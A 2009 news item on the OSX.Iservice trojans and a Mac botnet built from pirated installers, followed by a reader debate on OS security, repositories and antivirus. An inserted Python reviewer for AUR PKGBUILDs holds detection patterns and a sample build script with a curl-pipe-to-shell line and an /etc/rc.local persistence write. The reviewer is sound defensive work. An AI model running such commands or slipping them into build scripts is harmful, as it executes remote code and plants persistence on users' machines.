Remember the Mac trojan that we reported on earlier this year? A trojan was found piggybacking on copies of iWork and Photoshop CS4 found on warez sites and networks, and it would install itself after the user had entered his or her administrator password during the software’s installation. This trojan didn’t seem like much of a threat back then, but as it turns out, it’s now in use in the first Macintosh botnet.
Security researchers from Symantec have found evidence that these trojans, OSX.Iservice and OSX.Iservice.B, are being used to build a botnet for DDoS attacks. There’s at least one documented case of these trojans being used for a DDoS attack, and the researchers found that the botnet has encryption, a peer-to-peer engine, and remote startup capabilities.
“The code indicates that, wherever possible, the author tried to use the most flexible and extendible approach when creating it – and therefore we would not be surprised to see a new, modified variant in the near future,” the researchers said. Interestingly enough, they added that the person who wrote the trojans is not the same person who activated the botnet.
If you think you’ve been infected, you can use any Mac antivirus tool to clean your system; most of them have been updated to detect and remove these trojans. Since we’re talking about trojans here, there’s no need to worry about self-replication: a trojan is incapable of spreading on its own. As always, steer clear of pirated software to prevent things like this from happening.
Doubtless there will be snide remarks back and forth about how OS X was supposed to be the most secure OS, and there were no viruses for it. Put that aside for a moment and take it for the sobering wakeup call it is: No matter what OS you run, be it a fully patched Windows install, a fully patched OS X, or even a fully patched Linux install, all computers are vulnerable through their users’ lack of education. Personally, there aren’t many programs I don’t get from the Ubuntu repositories, unless there’s a newer version out; Linux is fairly safe in that regard, but if I were to download a torrent of anything that needed root access to install, I’d be a little worried about trojans too. On the one hand, serves them right for pirating software. On the other, it’s still a bitch that this happened. Computer users need to be educated before we let them loose into the wild.
The problem is not that they are punished because they pirate software (most of them probably won’t notice). The problem is that we who do not pirate are punished. A friend of mine says his mailserver receives 17 times more spam than “real mail”. The botnets are to blame.
It wasn’t a virus in this case, but a trojan.
Trojans are a potential problem for any system where the end users routinely install downloaded closed-source applications.
or open source ones and don’t read the source code.
Sigh!
No, you are wrong.
The distribution maintainers are not the same people who write the code.
The distribution maintainers necessarily MUST read the code in order to be able to put it into repositories.
In the real world, the distribution mechanism of open source repositories, coupled with a package manager on the client has an impeccable record.
http://www.google.com.au/search?q=define%3A+impeccable&ie=utf-8…
http://wordnetweb.princeton.edu/perl/webwn?s=impeccable
What part of “impeccable” do you not understand?
Edited 2009-04-19 07:05 UTC
The part where the Debian maintainer accidentally introduces a vulnerability in security-critical network facing software.
Or where the fedora repositories get owned remotely. This stuff can happen to the repository system (not saying that someone can’t attack Microsoft’s software distribution systems… I’m sure people have tried).
The case where the Debian maintainer introduced a vulnerability is not a case of an end user’s system getting malware via an executable. It was a security bug … not malware in and of itself.
The repository system has an impeccable record. There has been not one recorded case, over many years, for millions of users, of a user’s system getting malware through applications installed via the repository/package manager system.
The odd bit of buggy software? Yes, OK. But not malware. No trojan horses at all amongst all of that mountain of downloaded software. None. Zilch. Nada. Diddly squat.
Why is it apparently so very hard for Windows users to accept this fact?
Edited 2009-04-19 10:15 UTC
The fact that the OpenSSL “fix” in Debian wasn’t malware would be irrelevant to anyone whose system had been compromised and had their identity and other crucial information stolen, wouldn’t it?
The fortunate thing about the idiotic mistake by the Debian maintainer was that it was fixed very quickly, and that’s the only fortunate thing about it. This was an example of someone who did not know how OpenSSL worked mucking about in the code in an effort to improve it, and releasing that patched package into the community without proper testing. This means, by the way, that repositories are only as fool-proof as those who run them and maintain them… and there’s not one human being in the world today that hasn’t made mistakes.
I’ll certainly grant that repositories are, by design, a much more secure way of handling things than Windows or OS X have by default. But open your eyes, they aren’t fool-proof and do not have a perfect record. You can bury your head in the sand all you want, the real world is still around you whether you choose to look it in the face or not.
The fact is I take it upon blind faith when I connect to any community repository to install something that it has been properly maintained. The key word of course is properly. But I am completely at their mercy should someone have the means to introduce a root kit into a package with or without the maintainers knowledge. The official repositories work great, but quite often we do have to use the community repositories simply because a lot of packages just do not get included.
I think the point in regards to this topic of OSX is not so much that OSX is more vulnerable, because ANY OS has its holes, that is a fact of life. I would love to see much more bitching and whining about the people behind this crap than the usual back and forth banter about this or that OS. Any software is going to be vulnerable to a degree, and where there is a door and a pay off, someone will find a way to exploit. Viruses, bots, trojans, root kits, etc. have long since passed the domain of stupid little kids being mischievous. Today there are hardcore organized criminal groups that are operating 24/7 to find exploits in not just operating systems, but even secured network systems.
Pffft.
It is open source code. I’d love to hear your thoughts on a viable means that someone can introduce a whole raft of changes, adding up to a complete rootkit, into a set of open source code files without the maintainer’s knowledge.
As for “with the maintainer’s knowledge” … sheesh! What maintainer would have the chutzpah to even try such an outrageous and easily discovered thing?
(it is in plain sight of the whole user community, remember, not just the package maintainer).
It staggers the imagination that anyone believes that “a rootkit in the repositories” would be possible.
Some real-world examples of this wouldn’t hurt either. There are no non-repository packages installed on my current Arch Linux KDE 4.2 system, for example, and indeed it works great.
Just to be clear here … this particular malware did not get on to OSX because of any “security hole” in the OS. It got on to the systems via a trojan.
Trojans do not rely on security holes. They instead rely on the users installing them, deliberately, via normal means of installing software.
This can happen on ANY OS, but it can only happen if the users have no means of knowing (or being assured of the integrity of) what is in the code. Therefore, trojans are uniquely a problem for systems where users routinely install closed-source-code packages.
End of story.
I ask, once again, why it is apparently so very hard for Windows (and apparently OSX) users to accept this? It is as plain as the nose on people’s faces.
Edited 2009-04-19 23:51 UTC
I love Arch and the official repos are great, but there are many apps that are not in there and you have to go to AUR. On my own machine I have both a PlayStation and a PlayStation 2 emulator, both of which had to be installed from AUR. Those might be uncommon, but there are more common apps that are not in the official repos too. For example gnome-globalmenu and the avant window navigator (awn). And if I remember correctly, in order to install KDEmod you have to use an external repository.
A few points to make here:
(1) AUR is an open source repository. It is, AFAIK, a community source packages repository, it is not signed binary pre-compiled executables. One needs a client program other than pacman to install AUR packages, I believe yaourt is popular for this purpose. AUR is still, however, an open source repository.
http://wiki.archlinux.org/index.php/Yaourt
(2) Community open source repositories, AFAIK, enjoy the same impeccable record that official distribution repositories do … it is just that they are often far less well known. I certainly am not aware of any end user’s system ever getting malware via installing a program from a community open source repository.
(3) My KDE 4.2 Arch system, which works very well and which is very functional, does not include any packages from AUR. It does, however, use the KDEmod community repositories, which are, in turn, derived from the KDE project itself (all that the KDEmod repository does is compile and package the KDE desktop for Arch). It is not a case of repository maintainers going out and re-writing their own code, after all.
Edited 2009-04-20 03:24 UTC
AUR does not store any packages. It only stores scripts. You download the script and run it to get a package. You then use pacman to install the package. Most scripts download the source code and compile it, but there are some that download a pre-compiled binary. Yaourt or the like is NOT required.
Because of its nature it would be quite easy for somebody to submit a package build script with malicious commands in it into AUR. It would eventually be found and removed, but not before somebody downloaded it. This is why the wiki warns you to read through the package build script before running it.
Just because it hasn’t happened yet, doesn’t mean it can’t or won’t.
There is still a potential for abuse here. KDEmod repos are maintained only by the KDEmod devs. They could easily add malicious code to the applications themselves, or worse yet to the install scripts for each package which are executed as root. Non-official repos such as KDEmod are the Linux world equivalent of downloading programs from shady websites in the Windows world.
There is a good reason behind requiring you to edit a config file as root in order to enable a custom repo.
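As an added illustration of the “read the package build script before running it” advice above (this is not an Arch or AUR tool; the heuristics and the sample PKGBUILD are constructed for this example), here is a small reviewer aid that points out the lines of a PKGBUILD worth reading closely: downloads piped into a shell, fetches made inside build functions instead of the checksummed source=() array, writes to real system paths rather than $pkgdir, skipped checksums, and the presence of an install= script that pacman runs as root.

```python
"""Heuristic pre-run review of an AUR PKGBUILD (constructed example, not an Arch/AUR tool)."""
import re

# Line-level patterns: a hit means "read this line closely", not "this is malware".
LINE_CHECKS = [
    # A download piped straight into a shell bypasses makepkg's checksum step.
    ("pipe-to-shell", re.compile(r"\b(curl|wget)\b.*\|\s*(sudo\s+)?(ba|z)?sh\b")),
    # Decoded or eval'd text is the usual way to hide what a script really runs.
    ("obfuscation", re.compile(r"\b(eval|base64\s+(-d|--decode)|xxd\s+-r)\b")),
    # makepkg refuses to run as root; sudo inside a build script is a red flag.
    ("sudo-in-script", re.compile(r"\bsudo\b")),
    # An install= script runs as root at pacman install time and needs review too.
    ("install-script", re.compile(r"^\s*install=\S+")),
]
FUNC_START = re.compile(r"^\s*(\w+)\s*\(\)\s*\{")
BUILD_FUNCS = {"prepare", "build", "check", "package"}
# Fetching inside a function skips the source=() array, whose files makepkg verifies.
FETCH = re.compile(r"\b(curl|wget|git\s+clone)\b")
WRITE_CMD = re.compile(r"^\s*(cp|mv|install|ln|tee|chmod|chown|mkdir|rm|echo|cat)\b|>>?\s*/")
# Paths under $pkgdir/$srcdir are staging; anything else lands on the build host.
STAGED_PATH = re.compile(r'"?\$\{?(pkgdir|srcdir)\}?"?/\S*')
SYSTEM_PATH = re.compile(r"(?<![\w$}])(/etc|/usr|/opt|/home|/root|/var|~)/")
SUMS_ARRAY = re.compile(r"^[ \t]*\w+sums=\(([^)]*)\)", re.M)


def review_pkgbuild(text):
    """Return [(line_number, check_name, line_text)] sorted by line number."""
    findings = []
    func = None  # name of the shell function we are currently inside, if any
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0]  # crude comment strip, fine for this illustration
        if not line.strip():
            continue
        m = FUNC_START.match(line)
        if m:
            func = m.group(1)
            continue
        if line.strip() == "}":
            func = None
            continue
        for name, rx in LINE_CHECKS:
            if rx.search(line):
                findings.append((lineno, name, raw.strip()))
        if func in BUILD_FUNCS and FETCH.search(line):
            findings.append((lineno, "fetch-outside-source-array", raw.strip()))
        # Drop staged paths first so "$pkgdir/usr/bin" is not mistaken for /usr/bin.
        if WRITE_CMD.search(line) and SYSTEM_PATH.search(STAGED_PATH.sub("", line)):
            findings.append((lineno, "write-to-system-path", raw.strip()))
    # 'SKIP' in a checksum array means the downloaded source is never verified.
    for m in SUMS_ARRAY.finditer(text):
        if "SKIP" in m.group(1):
            lineno = text.count("\n", 0, m.start()) + 1
            findings.append((lineno, "checksum-skipped", m.group(0).splitlines()[0].strip()))
    return sorted(findings, key=lambda f: f[0])


# Constructed sample PKGBUILD for the demonstration; the URL and package are not real.
SAMPLE_PKGBUILD = """\
# Maintainer: constructed example, not a real AUR package
pkgname=example-emulator
pkgver=1.2
pkgrel=1
arch=('x86_64')
install=example.install
source=("https://example.invalid/emu-${pkgver}.tar.gz")
sha256sums=('SKIP')

build() {
  cd "$srcdir/emu-$pkgver"
  ./configure --prefix=/usr
  make
}

package() {
  cd "$srcdir/emu-$pkgver"
  make DESTDIR="$pkgdir" install
  install -Dm755 helper "$pkgdir/usr/bin/helper"
  curl -s https://example.invalid/extra.sh | sh
  echo 'helper &' >> /etc/rc.local
}
"""

if __name__ == "__main__":
    for lineno, name, line in review_pkgbuild(SAMPLE_PKGBUILD):
        print(f"line {lineno:3d}  {name:28s}  {line}")
```

A clean PKGBUILD that only writes under $pkgdir and verifies its sources produces no findings; the prefix line and the staged install line in the sample are deliberately left unflagged.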
You are talking theory … I am talking real-world performance, track record, what actually happens in real life.
I repeat for those who are apparently so very slow on the uptake … the package management systems and repositories for open source code have an impeccable track record. There has never been even one recorded case of an end user getting malware through this means of distributing software.
When people talk about concepts such as “There is still a potential for abuse here. KDEmod repos are maintained only by the KDEmod devs. They could easily add malicious code to the applications themselves” … they are simply not talking about what happens in the real world.
Sigh! Get real.
Get over it, Windows apologists. I cannot see the point in your inventing endless fantasies about open source that simply do not happen. The plain fact remains that the distribution system of open source code repositories, coupled with package management programs on the client machines, has an impeccable record as a means of malware-free software distribution.
Two points, here, with respect to that:
(1) No-one’s system was compromised. The error that was made resulted in it being easier by an order of magnitude to compromise the system … had anyone known about it. Even so, cracking the security even with this bug is no mean feat, and would have still required years of supercomputer time.
(2) However, no-one spotted the error for some while. Over two years, I believe … which supports the observations in (1) above.
Yes and no. The code still worked after the maintainer “improved” it. It is impossible to test that one version will take a supercomputer 5 years to crack, as against another version taking the same supercomputer 50 years to crack, if one does not happen to have on hand a supercomputer and 50 years of testing time …
True. Without a doubt.
I didn’t say they were fool proof … I said that they had an impeccable record. There is a vast ocean of difference in meaning there.
Furthermore they do indeed have an impeccable record. As I said, not one user’s system has been compromised or got infected with malware via installing software from the repositories using a package manager.
Any system on Windows and OSX cannot come close to touching that record … as this very thread topic attests to.
Sigh! No, you are wrong. The distribution maintainers are not the same people who write the code. The distribution maintainers necessarily MUST read the code in order to be able to put it into repositories.
What? I have never read through any software package I maintain. How am I supposed to read a million lines of code? Even for one package it would take days to read through new versions.
You are obviously living in an Ubuntu brown dreamland of Linux propaganda.
I might as well start “there are no viruses for it”
There are no viruses for it. Period.
I am aware of the difference between a virus and a trojan. Just now, every trojan infected Mac is a vector for a new virus.
Better not start, because this is one useless argument: a month ago you would have argued that there are no iBotnets either.
“Personally, there aren’t many programs I don’t get from the Ubuntu repositories”
This is one of the main things that can actually create a secure system. When users get their apps through their Linux distro’s repository, they’ve been tested and users can feel safe about installing them. Getting them elsewhere is just like leaving the door wide open. There are trusted 3rd party repositories, but you know what I mean.
What I’m worried about most is that the majority of people that run OS X don’t have any form of antivirus software, and still think that there are no viruses for mac, so won’t be looking to install any. That’s what worries me most :S
Antivirus isn’t necessarily any good if you’re inviting nasties into your system anyway. I can’t count how many PCs with Norton I’ve come across that have been riddled with viruses, because either a) Norton is incompetent, or b) a virus disabled or broke Norton in the many ways that’s easily possible.
Users running anti-virus on Macs would help, but only to a certain extent. There is no software to fix idiocy.
The solution to this, as I see it, is for Apple to push an update that removes it — a lot like Microsoft’s monthly malicious software removal tool.
Also, there’s no software to save us from viruses that we don’t know about. Security holes that haven’t been disclosed to the public.
What about heuristic analysis?
How about not borking the system with useless computations? The system should be safe by design. If the user finally downloads illegal content which might have a trojan embedded, then it’s the user’s fault. Other users shouldn’t be punished because of them.
The funny bit is, though, that a trojan like this would NEVER get through Windows Vista/7. Malware protection is built-in now, so I’d get a nice little dialog on my Windows boxes telling me this file is dangerous, we’ve blocked it for you. You want us to delete it?
Mac OS X has none of these kinds of features, and that’s why users get infected. People are going to download warez ANYWAY, so the better approach would be to protect users in cases like this – Windows will protect you, Mac OS X will not; because the latter has never had to deal with things like this, the OS wasn’t designed for it.
Cold and hard facts, and I’m sure the Apple Defense Brigade will be all over me like I’m covered in Tuscan honey and fairy dust, but it’s the truth.
Edited 2009-04-18 13:35 UTC
I don’t buy it. There’s no perfect solution for trojans. If the trojan is unknown there’s a big chance it will get executed. Also, no matter how many dialogs you get about something being dangerous, you’ll push the OK button to get your software installed. Well, not you, but most other stupid users will.
Edit: on a side note, does anyone remember TBAV for DOS? Anyone remember its really good heuristic method? It involved actually tracing the program in debugger mode to find out if it did something nasty.
Edited 2009-04-18 14:17 UTC
I don’t know if you’d call it “perfect” … but there IS actually a viable solution for Trojans.
Solution: Adopt a self-imposed policy of “only install applications from repositories using the package manager”.
This solution has worked for millions of people for many years now for hundreds of downloaded applications each. It has an impeccable record for those who stick to the policy.
Edited 2009-04-18 15:27 UTC
There have been cases of compromised repositories.
Sure, they were cleaned up after a short time, but it’s not a perfect solution.
And I doubt a repository like you know it from Linux works with the millions of apps for Windows (and MS can’t lock someone out of an official repository).
How about not downloading pirated applications? That would pretty much take the chances down to 0
Hmm, really?
How many people have turned off UAC because it was annoying? My mum received her machine with it off. I’m not sure why, but it’s disabled. She’s too afraid to click okay to just anything but there is always a possibility.
Besides, this wonderful security model in Windows Vista–it’s all trumped by OLE2/ActiveX. It’s a huge gate in the security wall.
I hope this wakes up a bunch of Mac users, but I’m cynical and don’t believe it will.
I’m also not surprised about Symantec warning us now instead of previously when the software was first reported to have an exploit. On the news programme “60 minutes”, the Symantec spokesperson never mentioned that there was a fix for Conficker directly from Microsoft.
Thom Holwerda wrote:
–“The funny bit is, though, that a trojan like this would NEVER get through Windows Vista/7. Malware protection is built-in now, so I’d get a nice little dialog on my Windows boxes telling me this file is dangerous, we’ve blocked it for you. You want us to delete it?”
I find this doubtful. Practically all Windows games and most applications require administrator rights to install (mainly because of arcane copy protection mechanisms), so how would the OS distinguish between DRM functionality included in a game (like protections which install services) and a trojan if baked into the installation procedure? These DRM schemes, just like trojans and rootkits, vary greatly and are constantly changed, so there is no way the OS can be updated to keep track of and identify them; not even dedicated virus software can keep up.
This isn’t about UAC, this is about Windows Defender. Defender does its thing with or without UAC, with or without administrative privileges.
The day I trust Windows Defender to keep my system secure is the day I trust Windows Firewall… not happening. MS may be attempting to be better at security, but they don’t exactly have the best reputation for it and I’ll wait for proof before I trust them.
Thom Holwerda wrote:
–“This isn’t about UAC, this is about Windows Defender. Defender does its thing with or without UAC, with or without administrative privileges.”
Granted, I have used Vista ever so slightly and during that time I did not install any software, but I’d guess that when you install commercial software like a game or an application, Windows Defender will warn you that this software can do harm to your system (due to copy protection/DRM code), and users will click past this warning in order to install said game/application. So how hard would it be for a cracked version to just include a rootkit in the crack which will then piggyback on the game/app installation?
Windows Defender is just a trimmed down antivirus program which only scans for trojans, and it is not even a good one. If you are lucky the signature of the trojan gets added and Windows Defender finds it; if you are unlucky you are screwed anyway…
So nothing new there, Windows Defender just does what other anti virus programs also do.
The main security issue with Windows Vista and 7 is that they finally sandbox the user outside of the root context within a user context, a basic security measure performed by any other operating system. But that does not prevent malware from getting in via “social engineering”, aka users hitting the OK button every time the Vista/7 “program needs root access” popup pops up!
Actually it would come through like any other program trying to do an internet connection…
If you install something on your machine which makes internet connections then you are hosed if it is malware. The only chance you have in this regard with windows 7 would be that microsoft could add the signature over time to windows defender or any other anti virus program has the signatures…
The malware is installed via the normal install process if you hit the ok button from the Windows User Control popup then you are screwed in this regard as well…
Cheers…
Oh dear.
Just when I thought your comments couldn’t get any worse, they do.
And it just shows your ignorance.
I’m not sure what else to say.
People automatically click yes to UAC, because it’s the easiest way to get rid of it and open what they want to open.
That is if they haven’t disabled it already.
Windows Defender I’m sure is fine (Although I’ve never had it work for me terribly well) for known threats, but if a new threat is on the block, I wouldn’t imagine it to work very well, just like Antivirus Software.
Any stupid user is going to infect any system, even Vista and Windows 7.
I’m beginning to think you’ve had a knock on the head if you believe that Vista/7 would stop any stupid user from infecting a system regardless of whether it’s patched.
He’s talkin ’bout Defender; not UAC. Trojans are blacklisted onto Windows Defender updates. It also monitors a good deal of suspicious behaviour. Unless we’re dealing with really advanced trojans; they’ll likely be caught.
I didn’t say that heuristic analysis is the best thing there is, I just said that it’s not true, that “there’s no software to save us from viruses that we don’t know about”.
Heuristics in all the antivirus products on the market raise almost exclusively false positives… which is why I think they are there. Who would buy antivirus software if they weren’t confronted with a “virus” from time to time?
Or c) the preloaded 3-month trial version of Norton that came with the computer expired and the owner didn’t realize it. Or d) the copy of Norton just randomly decided that it wasn’t properly-licensed and deactivated itself (although that possibly falls under point a).
well, that might change right now.
I’ve lost count of the number of computers running anti-virus software from this-or-that vendor that I had to “disinfect”. I’ve also lost count of the number of “infected” computers I had to reinstall because the anti-virus software went completely berserk (from the countermeasures used by the viruses themselves).
Fortunately, this isn’t my job anymore…
However, anti-virus software is still useful on Windows. But that’s because of the massive number of available malware for this platform combined with the almost baffling ignorance of most users.
I’ve always run anti-virus software on my Windows machines, but only once in 10 years did I get an infection (noticed almost immediately by a sudden burst of browser popups). And only maybe two or three times in that same amount of time did I get a warning from the anti-virus software about some blocked virus.
These Mac viruses are based on user ignorance alone; AV software can do almost nothing to prevent this.
Avoiding crack/serial sites and pirated software is a good place to start to avoid getting pwned. And today there is hardly an excuse for pirating software, even in Windows-land. Most computers already come with a Windows license, and there are opensource options for most of the rest (the only “alternative” that most people would probably not want is the office suite, but MS Office is not as expensive as it used to be).
Don’t be worried. There are no OS X viruses.
That’s why I believe the idea that antivirus companies are behind the creation of these viruses.
In the same way that all locksmiths are behind burglaries?
Actually, a local locksmith was charged with break and enter three weeks ago; I went to school with him. I knew not to trust him!
Many years ago one of my police friends told me that many locksmiths are closely associated with burglars or are burglars themselves. He said houses are often burgled a few weeks after a visit by the locksmith. In particular expect your house to be burgled if you buy a safe from a locksmith.
We, the members of the Global Association of Honest Locksmiths, would like to thank you for destroying our businesses with FUD, and for casting our families out onto the streets.
BTW, what’s your address?
And they’re in league with the Lumber Cartel, of course (the sinister, shadowy group responsible for anti-spam advocacy).
There aren’t. This malware is a Trojan, not a Virus. It does not replicate itself and it does not get onto a System without the help of its user.
Since antivirus software can’t really protect you from that kind of malware, beyond giving you a false feeling of security, I still regard antivirus software for OS X as obsolete.
I wouldn’t even think about buying antivirus software for Mac before we had something that comes over the network without my help, like Blaster or Conficker.
Worse yet OSX only has rudimentary anti-hacking measures. Leopard introduced limited ASLR and MAC. Vista and Linux have much more sophisticated access controls and address memory relocation schemes.
Sounds fishy to me.
I’m sure if viruses were a real threat to OS X, Apple would include anti-virus (for free) as a tool in their OS. Apple is ahead of the curve, people. Apple would not ‘forget’ to add something this obvious to their OS.
OS X FUD + money grabbing Symantec
If I can convince you to install my custom OS X applicationABC, then you do, and it does harm, is your OS insecure? or are you stupid/cheap for not buying the legal applicationABC in the first place?
Willfully installing dubious software comes with risks people. iWork is cheap, just go buy it.
Edited 2009-04-18 13:02 UTC
No offense, but what you said seems like a fanboy remark. If you look at the security model of Leopard vs Vista, Vista is a lot more secure in design. The reason the Mac hasn’t had any to date is the same as before — it wasn’t a lucrative target for virus-makers till now. Not because “Apple is ahead of the curve”. If that were the case they could have done some justice by including at least a simple paint program (iPhoto is *NOT* what I want).
As for being “cheap”, even World of Goo at $20 is pirated at 90% — it’s about getting things for free; and those two are *quite* different. IMHO.
However, I don’t think antivirus software is as needed as customer awareness and education. There was this incident where my friend complained that his (pirated) copy of Symantec was outdated. When I gave him Avira, he COMPLAINED that it showed a lot of virus warnings, so he removed it…
You are wrong. All major Windows virus and worms get in without the need for the user downloading and executing them.
This is just a case for user stupidity.
People like analogies, so here goes one:
A guy is worried about his house safety. So he buys the best door and a good security system. It works fine. Only he is able to get in and out. One day he meets another guy in a party, they talk and seem to become good friends. He invites his new friend home and lets him in. He got robbed.
Edit: after re-reading that “Vista is more secure in design”, come on. What design?
Edited 2009-04-18 13:25 UTC
About the only thing that Microsoft actually provides is Defender which protects one against spyware/adware/etc.
What I don’t understand is why it is the operating systems responsibility to protect people from installing things they downloaded off the internet. What one needs to do is separate (as you did in your analogy) between a user downloading and choosing to install something from a non-reputable source and a worm which makes its way into a computer through a security hole in the operating system – that is, an outside attack on the operating system and not an infection bought into the system by the end user him or herself.
The simple fact of the matter is, people downloaded pirated software, they knew the risks, they were also shown how to remove this nasty from their system the moment it was found – and yet they failed to take any step. To me, those who are infected are just as guilty as those who failed to update their copy of Windows and have become infected by the Conficker worm.
Edited 2009-04-18 14:08 UTC
Bleh. Enumerating badness is always a bad idea but OSX only has rudimentary anti-exploit measures compared to Vista and Linux even when you ignore blacklisting applications like Defender. Only in Leopard did Apple introduce Mandatory Access Controls and limited ASLR, which is similar to what Windows offered with XP SP2.
Regardless of whose fault it is, these issues can be mitigated to some extent through proper access controls.
There is a point where an individual has to start taking responsibility for the choices they make; I was just pointing out that even with all the security features there are still infections. The prime example would be my old man, who has been infected – something that could have been stopped had he run Windows Update. So with all the features, the weakest point of failure is always going to be the end user.
I’m neither going to attack Microsoft or Apple because attacking them is like attacking AIG for the financial fiasco and ignoring the individuals within the market external of the ‘great Satan’ (aka AIG) who caused it.
And even when the controls are in place the system is just as vulnerable as Mac OS X with less of those proper access controls. As I said the end user is the weakest link – and the only way to get around this is through automatic updates (which Apple and Microsoft have on by default) – but even then there is a window of opportunity. As I said, it comes down to personal responsibility – a virtue that many people in today’s society try to evade.
No. If a system has proper access controls this can’t happen. A program like iWork is NOT going to open ports and participate in a botnet if there is a proper policy in place. That would require the user to manually change the policy, which is above and beyond a normal user’s ability.
Automatic updates are NOT going to solve this as well as access controls will. Updates don’t help at all for a 0-day, a good policy will. Without being able to protect against unknown threats, any security technology is severely limited because you are back to essentially enumerating badness.
“There is a point where an individual has to start taking responsibility for the choices they make;…”
You just hit the nail on the head. Sadly in todays society, people are taught from a young age that everything is always someone else fault. That is why there are so many lawsuits and idiotic defenses these days. That carries over into computer usage and everything else people do. People don’t have a clue what it means to be held accountable for actions these days, as if they do something wrong and don’t die, they can always sue someone for their own stupidity.
You’re missing the bigger picture. These things can be mitigated. The technology exists. Users are going to do stupid things, we know that. Bitching about it incessantly isn’t going to get us anywhere. Instead we should focus on getting proper security implemented in desktop operating systems. iWork should not have privileges that allow it to connect to a botnet.
iWork doesn’t have privileges which allow it to connect to a botnet. This trojan simply piggy-backed on the iWork installer, and it took advantage of the elevated privileges the installer temporarily acquired to insert itself into the startup routines of the computer. The trojan isn’t in iWork itself at all, it’s just on the installer pkg… and if anyone has ever looked at an OS X pkg file, you know this is distressingly easy to accomplish. It’s also easy to remove the trojan from the pkg, but you’d have to know to look for it.
I’m not sure how we’d avoid things like this. We can insert all the security we want, but if the user grants the required privileges to something malicious, and ignores all common sense… well, we can’t save the idiots from themselves.
This doesn’t change anything. The installer should not have these privileges. Something like this is easily mitigated. This should be extremely easy considering iWork is a product from Apple.
I agree that users are always going to do stupid things but when we already have solutions to the problems they encounter we should be supporting those solutions, not bitching about user stupidity.
The reason the iWork installer, and other pkgs, have such privileges is that they are required to write to the /Applications folder where such items are stored.
What Apple needs to do is to have a much finer grain of control over security, an installer could explicitly request that it have permissions to write to the /Applications folder and nothing else if it doesn’t need it. But the fact is, even if they did that, it wouldn’t help. You can put a trojan into just about anything, piggy-back it on to almost any installer package you want, because the pkg folder is extremely easy to dissect and modify for anyone who knows what they’re doing. It’s about as open as you can get, both in specifications and literally easy to view and modify.
If Apple were to close this up, make it harder to modify, you’d have everyone in an uproar about the fact that the format was now closed, how dare they, etc etc… If they leave the format open, it’s very easy to embed bad things into it and to modify the installers accordingly. Where’s the happy medium in this situation?
It comes back, yet again, to user stupidity. It doesn’t matter how much security you implement, and it never will when it comes to manually installed trojans and viruses. Yes, the danger of worms and other remote vulnerabilities can be mitigated, but we’re not facing a remote vulnerability here.
Whoops, was away a bit too long.
@sbenitezb
Virii get in without users’ need? Besides Conficker I can’t recall a good case. XP’s security sucks; no doubt. But I’m not referring to XP. Even in XP; avoiding IE + Autoplay was all it took for me to skip any virii ending up on my laptop for over 2 years.
Your analogy applies just as well to Vista. Nevertheless, I don’t like analogies to prove a point; they’re generally good for teaching only.. IMO
As for the security; take a look at Miller’s interview. Whether you think he’s a scumbag or not, the precautions he mentions taken by Vista are much superior. There you have it, your “design”. On the other hand, how is “Leopard’s design” any better?
@kaiwai: Seconded.
Edited 2009-04-18 14:28 UTC
Quit saying virii. The English plural is viruses. And the Latin plural is not -ii.
And, just a reminder … it wasn’t even a virus in this case. It was a trojan. That means that people downloaded it, deliberately, themselves, from an untrustworthy source, installed it without having any idea at all of its integrity, and ignored any warnings that popped up while they did so.
No system can survive stupidity like that.
The only possible “defense” is to avoid installing closed-source applications in which malware can be hidden.
Edited 2009-04-18 15:32 UTC
Thing about that is… it would only work if the OS in question uses a package manager. OS X doesn’t, neither does Windows, and I’d hate to see what Apple might attempt to do if they built a central package manager into OS X. Mac App Store and jailbreaking, anyone?
@sbenitezb: about virus…es, it was something of a fetish
@Kroc: MD5!?! Why would a general user go through something as geeky as checking the MD5 hash?
@werpu: No — an anti-malware is NOT an anti-virus. Also; wha!? Did you even use vista?!?
I second darknexus, all it takes is a serial-key..
I know anti-malware is not anti-virus, but the lines between malware, virii and trojans are blurry; many anti-virus packages also come with anti-malware and anti-trojan functionality. Windows Defender is not an exception here, but it leaves out dedicated virii and some kinds of malware due to not trying to push into the markets of anti-virus vendors. I am not sure how good Windows Defender is, but I rather doubt that it decreases your chances of being hit by a trojan if you apply user stupidity a lot…
I have not heard too many good things about it, but on the other hand also not too many bad ones. Probably because most people do not bother too much about it, but go for a different solution anyway…
This is from an interview with the guy who cracked Safari in a matter of seconds in the last Pwn2Own:
http://blogs.zdnet.com/security/?p=2941
Apple has a long, distinguished history of completely ignoring security, and that hasn’t changed in OS X.
I honestly don’t know/understand what makes an OS secure or not. All I know is that I know of no OS X/Linux users with a virus and with Windows…..
This article is not talking about a virus, it’s talking about installing custom software that normal OS X users would be at risk of, and that can’t even spread.
What we’re talking about is users that intentionally download illegal software and ignorantly trusting the sources.
@lqsh: In the majority of those “Windows….” cases it’s through cracked software, and not updating their OSes…
Edited 2009-04-18 14:28 UTC
Guess I better tell my grandparents to stop downloading all those warez then
So the majority of Windows users are grandparents?
EDIT: and they’re updating the OS too?
Edited 2009-04-18 14:53 UTC
He missed a grandparent-friendly case:
“Please click on this link to view an animated ecard program sent by your grandson!” *trojaned*
In contradiction to a previous poster’s comment, more like 80-90% of Windows badware exploits no vulnerability in the OS. Most of the rest are developed after the patch was released via reverse-engineering.
Perfect example, and aside from pirated/illegal downloads, easily the most prevalent cause of infection. Specifically, I see a lot of these that have a payload of Vundo along with several others such as AV360 and SPW2009. The number of times I’ve had to clean those out…
This is why educating computer users would be more valuable than any Antivirus solution… a pity most don’t seem to want to be educated. You have a tool (a computer in this case) you should be expected to know some things about maintaining it and safety (both yours and everyone else’s).
I wanted to; but couldn’t get a good e-mail into my head
Actually, Vista is not really that much more secure by design; the system security measures are pretty much up to par, trying to put the user into a sandbox model and trying to enforce userland on everything.
(Which Vista fails utterly at, with UAC popping up every five seconds instead of trying to sandbox root-access programs, but neither does OS X; the programs mostly behave better, though, with their possible userland install for 90% of them.)
The main difference is that Vista comes with a trimmed-down anti-virus program, Windows Defender…
The rest is propaganda by Microsoft, sorry!
Burying your head in the sand is an awesome defense strategy.
Antivirus vendors try to make a big deal out of it. It isn’t a virus, it isn’t even a worm. It can’t replicate itself and it isn’t any threat for real. It’s just a trojanized program. People downloading illegal software from p2p networks are really asking for trouble. You can’t trust anyone, but the software maker or very known distributors.
Whatever people say about OS X and other *nix kind security, it’s clear in this case it is not the OS’s fault, it’s the user’s fault. The OS can’t and won’t ever prevent malware from executing if the user is giving consent to execute software.
I would find it hard to not believe Symantec is involved in this illegal distribution of trojanized software to spread some FUD and convince Mac users they need their “protection”.
“At least ****ONE**** documented case”
